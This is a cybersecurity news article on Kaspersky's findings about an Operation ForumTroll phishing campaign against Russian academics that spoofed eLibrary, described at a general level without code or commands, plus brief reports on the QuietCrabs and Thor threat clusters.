A new wave of phishing attacks linked to Operation ForumTroll has been observed targeting academic professionals in Russia, according to cybersecurity researchers at Kaspersky. The activity was detected in October 2025, marking a shift in the threat actor’s focus from organizations to individual scholars.
Security analysts noted that the campaign primarily targets experts in political science, international relations, and global economics who are affiliated with leading Russian universities and research institutions. Researcher Georgy Kucherin stated that this phase of the operation demonstrates a clear move toward highly personalized attacks against specific professionals.
Operation ForumTroll is known for conducting advanced phishing campaigns that previously abused a zero day vulnerability in Google Chrome, tracked as CVE 2025 2783. That earlier activity was used to distribute the LeetAgent backdoor and a spyware implant called Dante. The latest campaign, however, relies more on social engineering and carefully prepared infrastructure.
The attack begins with deceptive emails pretending to originate from eLibrary, a well known Russian scientific digital library. These messages are sent from the address support@e-library[.]wiki, a domain that was registered in March 2025, several months before the phishing activity began. According to analysts, this deliberate domain aging was intended to avoid suspicion commonly associated with newly registered domains.
To further strengthen the deception, the attackers hosted a cloned version of the legitimate eLibrary website, eLibrary, on the fake domain. The emails encourage recipients to click a link to download a plagiarism report. Once clicked, the victim receives a ZIP archive named using their full personal identity, including last name, first name, and patronymic.
These malicious download links are configured for single use only. Any attempt to access the same link again results in an error message in Russian stating that the download has failed. If the link is opened on a non Windows system, the user is instructed to try again later on a Windows computer.
Inside the ZIP file is a Windows shortcut file. When executed, it launches a PowerShell script that retrieves and runs a secondary payload from a remote server. This payload then contacts another server to download a final stage DLL, establishes persistence using COM hijacking, and displays a decoy PDF file to distract the victim.
The final stage of the infection deploys Tuoni, a command and control and red teaming framework that grants attackers full remote access to the compromised Windows system. According to Kaspersky, ForumTroll has been active against organizations and individuals in Russia and Belarus since at least 2022, suggesting the group is likely to continue its operations in the region.
In a related development, Positive Technologies reported on two additional threat clusters known as QuietCrabs and Thor. QuietCrabs, believed to be linked to China and also tracked as UTA0178 and UNC5221, exploits vulnerabilities in products such as Microsoft SharePoint and Ivanti solutions to deploy web shells and loaders that ultimately install the Sliver implant.
Meanwhile, the Thor group, first observed in 2025 attacks against Russian companies, has been associated with ransomware operations. Researchers reported the use of LockBit and Babuk ransomware, along with remote management tools, to maintain long term access to compromised environments.
Found this article interesting? Follow us on X (Twitter) , Facebook, Blue sky and LinkedIn to read more exclusive content we post.
